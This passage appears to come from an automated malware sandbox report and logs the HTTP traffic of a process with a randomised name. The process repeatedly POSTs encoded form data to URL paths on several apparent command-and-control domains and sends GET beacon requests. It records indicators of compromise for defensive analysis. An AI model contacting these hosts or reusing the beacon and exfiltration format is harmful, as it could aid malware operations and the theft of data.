                                                                  Referer: http://www.weeksee.net/4p3r/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 47 4d 67 33 6a 34 6b 39 6a 6b 72 4d 73 6d 50 47 79 62 45 59 63 74 65 52 57 61 33 4c 43 77 32 73 6a 6d 32 4f 67 6f 75 41 2b 53 39 44 45 54 57 37 36 45 58 41 51 62 71 65 35 32 66 43 34 4e 50 7a 4b 67 59 51 34 6a 6e 77 4a 75 7a 57 6c 49 35 46 33 51 53 77 5a 37 78 78 59 4d 58 55 6d 74 48 4e 50 48 4d 42 53 52 47 67 30 61 6e 4b 6d 36 69 77 73 76 33 42 65 45 2b 44 41 4b 39 43 63 4b 6d 4b 31 70 62 37 75 6b 6c 58 59 2b 45 74 47 45 73 43 66 64 62 4c 4d 59 4c 79 79 74 52 6f 4c 38 73 33 6b 68 73 51 43 6c 58 6e 75 39 54 47 74 45 58 76 45 41 7a 30 38 45 31 73 75 58 6d 33 32 35 47 55 76 67 3d 3d
                                                                  Data Ascii: Vt8pNT=GMg3j4k9jkrMsmPGybEYcteRWa3LCw2sjm2OgouA+S9DETW76EXAQbqe52fC4NPzKgYQ4jnwJuzWlI5F3QSwZ7xxYMXUmtHNPHMBSRGg0anKm6iwsv3BeE+DAK9CcKmK1pb7uklXY+EtGEsCfdbLMYLyytRoL8s3khsQClXnu9TGtEXvEAz08E1suXm325GUvg==
                                                                  Oct 11, 2024 16:47:07.008179903 CEST387INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:47:06 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.450012172.232.112.221803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:08.679039955 CEST748OUTPOST /4p3r/ HTTP/1.1
                                                                  Host: www.weeksee.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.weeksee.net
                                                                  Referer: http://www.weeksee.net/4p3r/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 47 4d 67 33 6a 34 6b 39 6a 6b 72 4d 73 48 2f 47 7a 34 63 59 5a 4e 65 51 4b 4b 33 4c 56 67 33 6c 6a 6d 36 4f 67 71 44 4c 39 67 70 44 48 78 4f 37 37 46 58 41 52 62 71 65 79 57 65 4b 6d 39 50 34 4b 67 55 59 34 6d 66 77 4a 75 6e 57 6c 4b 52 46 33 6a 36 76 4c 62 78 7a 55 73 58 57 37 39 48 4e 50 48 4d 42 53 52 43 61 30 61 2f 4b 6d 4b 79 77 39 2b 33 47 64 45 2b 43 58 36 39 43 57 61 6e 4e 31 70 62 6a 75 6d 52 35 59 38 4d 74 47 42 49 43 63 50 6a 49 46 59 4c 77 2f 4e 51 38 45 64 4e 69 69 52 31 63 64 30 6e 72 6e 66 72 52 6c 69 47 31 56 78 53 6a 75 45 52 66 7a 51 76 44 37 36 37 64 30 6b 48 42 77 57 7a 51 47 61 4c 57 75 72 75 69 68 62 33 6c 62 53 4d 3d
                                                                  Data Ascii: Vt8pNT=GMg3j4k9jkrMsH/Gz4cYZNeQKK3LVg3ljm6OgqDL9gpDHxO77FXARbqeyWeKm9P4KgUY4mfwJunWlKRF3j6vLbxzUsXW79HNPHMBSRCa0a/KmKyw9+3GdE+CX69CWanN1pbjumR5Y8MtGBICcPjIFYLw/NQ8EdNiiR1cd0nrnfrRliG1VxSjuERfzQvD767d0kHBwWzQGaLWuruihb3lbSM=
                                                                  Oct 11, 2024 16:47:09.596858978 CEST387INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:47:09 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.450013172.232.112.221803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:11.222754955 CEST10830OUTPOST /4p3r/ HTTP/1.1
                                                                  Host: www.weeksee.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.weeksee.net
                                                                  Referer: http://www.weeksee.net/4p3r/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 47 4d 67 33 6a 34 6b 39 6a 6b 72 4d 73 48 2f 47 7a 34 63 59 5a 4e 65 51 4b 4b 33 4c 56 67 33 6c 6a 6d 36 4f 67 71 44 4c 39 67 52 44 48 43 47 37 37 6d 2f 41 44 72 71 65 78 57 65 4a 6d 39 50 6c 4b 67 4d 63 34 6d 44 4f 4a 73 66 57 6a 5a 70 46 31 57 4f 76 53 72 78 7a 63 4d 58 62 6d 74 48 55 50 48 63 46 53 51 79 61 30 61 2f 4b 6d 49 61 77 74 66 33 47 62 45 2b 44 41 4b 39 77 63 4b 6d 71 31 71 72 5a 75 6d 56 48 59 4e 73 74 47 68 59 43 61 36 50 49 4b 59 4c 49 78 74 51 30 45 64 41 79 69 52 70 36 64 30 53 45 6e 63 33 52 68 32 61 69 51 56 6d 7a 39 79 35 4f 6b 33 33 54 38 36 32 64 31 44 53 31 35 45 48 33 56 5a 44 55 6a 61 58 4e 7a 34 62 52 59 30 30 64 75 69 50 43 51 73 6e 67 72 73 79 4e 70 75 55 33 46 6a 74 49 45 67 48 58 37 37 59 31 2b 51 74 2f 4d 73 54 31 49 68 57 5a 55 49 4f 50 65 37 43 52 55 45 35 54 50 31 52 76 62 41 4d 41 6a 43 79 4b 5a 4f 37 41 63 4c 70 79 5a 59 50 33 66 4e 45 4d 77 4b 32 4b 5a 51 45 5a 46 6c 41 59 6f 71 69 43 4a 65 48 5a 70 68 4c 6a 63 4e 33 32 49 76 4b 64 4e 61 6b [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=GMg3j4k9jkrMsH/Gz4cYZNeQKK3LVg3ljm6OgqDL9gRDHCG77m/ADrqexWeJm9PlKgMc4mDOJsfWjZpF1WOvSrxzcMXbmtHUPHcFSQya0a/KmIawtf3GbE+DAK9wcKmq1qrZumVHYNstGhYCa6PIKYLIxtQ0EdAyiRp6d0SEnc3Rh2aiQVmz9y5Ok33T862d1DS15EH3VZDUjaXNz4bRY00duiPCQsngrsyNpuU3FjtIEgHX77Y1+Qt/MsT1IhWZUIOPe7CRUE5TP1RvbAMAjCyKZO7AcLpyZYP3fNEMwK2KZQEZFlAYoqiCJeHZphLjcN32IvKdNakM8EcVMBRN6KK1xwwQYkS68tAZccPDoxhluPYw2fWVL/eayIPLtZLNrEDWH+BVtUotGe2KOH+Ree7b1CAEyH4EE+s2YJXSy3hueNlM68glPM+s7P2TMylSYeK8yYHLuzAlHFQuD9T5CCEaORMWdZ+40zRUFd+pwfDd9dHrj2Fua0wcjXBw+U9fvwr85TjrT6HWXBueK7+rKphtbQjXGbtxurWfQqku61y2m8sffKZdnZVN+yic7AzUHnyVvGaZzoEdf67yHtU1xHyAml+uM+/cQlFeN8iode6mzDXPerQDkDmJkyFLQOz1HomTDod7clVE5mnO+VHIjAcHAK+WspzuYhpR+hrhFiyJTwNr1SRYCM+WtHyOlR81DOCGBuZ3kndaRxFn2Z6W1C8wO+0CK0S0euUwDlJHl8hDBAeLlGJpA3rEjhFMyF+6jCXLe/DQ9pFWe1I2clOyyNQU26OofWnr4Ea2SUFLchDHiLsUYL0R8jVEc6JKjfu2V89tHh7erE/6O/GxettCo0AH2GSL0sIk3k5WGw3rsSWESqSk4V4x3COGY+R1MnCvJrxKXglgp4tP0JYRcMxDWm7NjbCtOSAsKx3LnicW7n1o7CylcT3tKnOa/JtYwsQg8YliKCKUbJwAg+VHHMDgunO0+0evfJvcLM3lSDs9bTVhQ [TRUNCATED]
                                                                  Oct 11, 2024 16:47:12.123183012 CEST387INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:47:11 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.450014172.232.112.221803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:13.767122030 CEST462OUTGET /4p3r/?Vt8pNT=LOIXgNA6yVbIhH/97YISWpaaeYXaQBHJvGCpm6n32QVnUTq8xwvOH/+QlB31wK7nJw4esWbzPeXe8oRJ9Ty3LI5fbZj0io6+NlMHOgvhq63Ws7W9v5i5bXc=&e4x=ktCxONu0 HTTP/1.1
                                                                  Host: www.weeksee.net
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Oct 11, 2024 16:47:14.640455961 CEST723INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Fri, 11 Oct 2024 14:47:14 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 564
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.450015154.82.70.195803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:21.063700914 CEST725OUTPOST /u1em/ HTTP/1.1
                                                                  Host: www.ddzc.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.ddzc.store
                                                                  Referer: http://www.ddzc.store/u1em/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 48 78 50 30 71 52 48 35 66 66 4f 38 31 6d 35 6d 6f 78 68 76 35 78 4a 6c 6b 52 56 33 76 74 74 75 63 74 38 74 68 44 73 50 41 75 73 31 4f 4b 38 67 51 75 38 61 2b 56 69 4a 53 37 78 73 46 5a 2b 33 2f 62 75 61 50 78 63 45 2f 6a 66 5a 36 67 74 70 65 32 62 59 4c 6b 5a 68 52 73 53 4a 48 79 71 74 67 49 2f 6a 4b 38 4c 72 49 4d 73 34 6d 4a 73 50 6e 6c 4c 4a 78 6e 6c 62 6a 2f 39 46 7a 44 37 4d 51 32 37 73 72 33 45 75 6c 32 69 55 70 58 2b 7a 59 6f 78 31 6d 79 41 4d 4b 70 77 67 46 49 57 54 6a 43 31 57 36 77 38 78 75 6f 48 48 45 73 6a 53 47 51 7a 71 64 67 74 36 76 39 76 52 54 35 7a 37 47 67 3d 3d
                                                                  Data Ascii: Vt8pNT=HxP0qRH5ffO81m5moxhv5xJlkRV3vttuct8thDsPAus1OK8gQu8a+ViJS7xsFZ+3/buaPxcE/jfZ6gtpe2bYLkZhRsSJHyqtgI/jK8LrIMs4mJsPnlLJxnlbj/9FzD7MQ27sr3Eul2iUpX+zYox1myAMKpwgFIWTjC1W6w8xuoHHEsjSGQzqdgt6v9vRT5z7Gg==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.450016154.82.70.195803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:23.608690977 CEST745OUTPOST /u1em/ HTTP/1.1
                                                                  Host: www.ddzc.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.ddzc.store
                                                                  Referer: http://www.ddzc.store/u1em/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 223
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 48 78 50 30 71 52 48 35 66 66 4f 38 31 46 68 6d 6e 77 68 76 75 68 4a 6d 34 42 56 33 6c 4e 74 71 63 74 41 74 68 48 55 66 44 62 30 31 58 76 41 67 52 73 45 61 2f 56 69 4a 64 62 78 74 59 70 2b 67 2f 62 71 6f 50 77 51 45 2f 6e 50 5a 36 6b 6c 70 66 42 48 5a 4c 30 5a 6a 4a 63 53 4c 59 69 71 74 67 49 2f 6a 4b 39 76 46 49 4d 30 34 6d 36 6b 50 6d 45 4c 4b 2f 48 6c 59 30 50 39 46 69 54 37 49 51 32 37 30 72 7a 46 6d 6c 30 71 55 70 57 69 7a 62 35 78 32 73 79 41 4f 45 4a 78 70 43 35 33 2b 74 6e 59 4d 77 47 67 2b 77 34 66 73 42 71 79 49 58 68 53 39 50 67 4a 4a 79 36 6d 6c 65 36 4f 79 64 67 6d 55 66 77 75 62 69 6b 46 58 44 73 34 61 65 52 52 54 46 53 55 3d
                                                                  Data Ascii: Vt8pNT=HxP0qRH5ffO81FhmnwhvuhJm4BV3lNtqctAthHUfDb01XvAgRsEa/ViJdbxtYp+g/bqoPwQE/nPZ6klpfBHZL0ZjJcSLYiqtgI/jK9vFIM04m6kPmELK/HlY0P9FiT7IQ270rzFml0qUpWizb5x2syAOEJxpC53+tnYMwGg+w4fsBqyIXhS9PgJJy6mle6OydgmUfwubikFXDs4aeRRTFSU=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.450017154.82.70.195803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:26.150166988 CEST10827OUTPOST /u1em/ HTTP/1.1
                                                                  Host: www.ddzc.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.ddzc.store
                                                                  Referer: http://www.ddzc.store/u1em/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10303
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 48 78 50 30 71 52 48 35 66 66 4f 38 31 46 68 6d 6e 77 68 76 75 68 4a 6d 34 42 56 33 6c 4e 74 71 63 74 41 74 68 48 55 66 44 59 55 31 58 35 55 67 51 4c 6f 61 74 46 69 4a 55 37 78 6f 59 70 2f 69 2f 62 53 73 50 77 4d 79 2f 68 54 5a 37 44 6c 70 58 56 7a 5a 41 30 5a 6a 56 73 53 4b 48 79 71 34 67 49 76 6e 4b 39 2f 46 49 4d 30 34 6d 37 30 50 68 56 4c 4b 76 33 6c 62 6a 2f 39 7a 7a 44 36 76 51 79 58 6b 72 7a 49 45 6c 45 4b 55 77 32 79 7a 5a 4c 70 32 76 53 41 51 55 5a 78 78 43 35 37 39 74 6a 34 49 77 47 39 54 77 36 44 73 41 66 76 43 4b 41 6d 41 62 53 39 49 77 36 71 41 56 4e 32 78 54 51 69 56 63 69 4b 34 35 6d 51 2b 4f 37 70 34 43 42 4a 53 64 30 56 37 50 6b 56 69 48 49 54 72 64 78 69 74 2b 72 55 46 41 32 30 5a 69 6b 79 61 42 74 34 59 73 7a 6a 34 79 50 6c 32 77 44 7a 54 67 32 45 34 33 61 42 37 48 53 77 7a 65 6a 49 64 6d 63 4c 58 75 4f 4e 75 57 33 59 50 54 78 70 41 31 75 4e 4b 4a 37 43 70 45 52 7a 42 77 76 62 6b 7a 66 39 76 48 6c 4b 42 38 32 67 41 73 68 48 51 63 46 49 79 53 70 53 74 79 36 2b [TRUNCATED]
                                                                  Data Ascii: Vt8pNT=HxP0qRH5ffO81FhmnwhvuhJm4BV3lNtqctAthHUfDYU1X5UgQLoatFiJU7xoYp/i/bSsPwMy/hTZ7DlpXVzZA0ZjVsSKHyq4gIvnK9/FIM04m70PhVLKv3lbj/9zzD6vQyXkrzIElEKUw2yzZLp2vSAQUZxxC579tj4IwG9Tw6DsAfvCKAmAbS9Iw6qAVN2xTQiVciK45mQ+O7p4CBJSd0V7PkViHITrdxit+rUFA20ZikyaBt4Yszj4yPl2wDzTg2E43aB7HSwzejIdmcLXuONuW3YPTxpA1uNKJ7CpERzBwvbkzf9vHlKB82gAshHQcFIySpSty6+AtRwAPuWQ+ySKfXe5jK0dGr8iQILA9pWqXC8kYTkV6VJLVvQ7bkFonjZRLu962wGb3nZgqaaEppYu5EJaeJej075hHwL4pWujxilmAAm+m2uuC+gEy7FBmEfEFpfFad6Yir6KwwobrevCzBYYdY6PjZcRpNuRXYn2C6I3R7c6ZL+ypna0hAqAktEJ5R/HVHRFQe1+DiE17s3iC2HZMJMYUaSJXn4YN0eEJXws/lvb4ZpAfmz62rZQlki0IO+8lwm2afCJhVXLWnI53wQOC3wdLLShn5tOnDXg4r76DDwYsXPbTQFR3bTOCxAxgGy2nu+UfFqt92fhWlmRToo2oBdVnDcab4TMsbVJbGfPNtBYdeZpREuMWYhfMv/+8NmTQjuvUWPZ4EE4yiui0M3NAUX5SOvBLWISWUPhk58wWPynolGPvY3ficK6RD7C9mZ9I1i/P2ntkNkQYrcO4+PeECrbzNI+6XiLiR/NgoZn0tSGmnZwUVho7IvZeQVTTNVzhxqyQu/zOZTWaxlrQHT33/+cX6ynU38a94bSsXpw2/eS8dbsDas32Sblr8Yq97BwfYP97oC5akvVP0HZm+/we3ormoaOZtvpqMYrp9dE8ymOCHcUwNw/dRxYrEPwS+uniYa10GMFAYezrqsP8frhDOnjcdOJYBpe9NvMm [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.450018154.82.70.195803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:28.693123102 CEST461OUTGET /u1em/?e4x=ktCxONu0&Vt8pNT=KznUpk/xHe6n1X9mtj5I6E8xs3xw/O5MevsqvgsUAqRDUKoafro8pFGdMZBnRKuB8O2sPyUarQrP+wlcZkakd0lPWPqUfDTmoYHoDPqwNuY6qLwvsQiX+Fs= HTTP/1.1
                                                                  Host: www.ddzc.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.4500193.33.130.190803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:55.109816074 CEST755OUTPOST /bba0/ HTTP/1.1
                                                                  Host: www.trencheslondon.store
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.trencheslondon.store
                                                                  Referer: http://www.trencheslondon.store/bba0/
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                                  Data Raw: 56 74 38 70 4e 54 3d 2b 30 46 68 65 6e 67 58 4d 72 53 77 45 47 50 72 61 54 67 4a 75 32 44 32 50 68 39 59 39 41 50 53 55 45 33 2b 34 70 59 34 34 59 4b 42 6c 71 6e 58 42 59 78 33 58 64 77 38 39 49 72 75 6d 4d 6a 74 39 73 66 51 42 46 4a 36 79 36 45 51 69 49 32 46 54 4e 37 34 30 52 41 47 44 70 54 30 79 65 68 59 43 39 7a 4d 35 66 38 34 4c 56 76 64 44 64 4f 58 79 31 57 4c 68 6f 42 30 4d 34 38 54 48 37 6a 59 6e 36 41 41 50 61 4e 55 64 2f 73 74 51 61 38 66 69 6d 6c 39 2b 4c 57 35 66 38 7a 57 43 48 72 2b 34 6e 2b 39 7a 47 73 32 2f 65 68 79 75 54 4d 43 77 6c 6c 34 73 4f 6d 6a 57 41 7a 33 71 52 4a 36 36 67 3d 3d
                                                                  Data Ascii: Vt8pNT=+0FhengXMrSwEGPraTgJu2D2Ph9Y9APSUE3+4pY44YKBlqnXBYx3Xdw89IrumMjt9sfQBFJ6y6EQiI2FTN740RAGDpT0yehYC9zM5f84LVvdDdOXy1WLhoB0M48TH7jYn6AAPaNUd/stQa8fiml9+LW5f8zWCHr+4n+9zGs2/ehyuTMCwll4sOmjWAz3qRJ66g==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.4500203.33.130.190803632C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 11, 2024 16:47:57.648400068 CEST775OUTPOST /bba0/ HTTP/1.1
                                                                  Host: www.trencheslondon.store
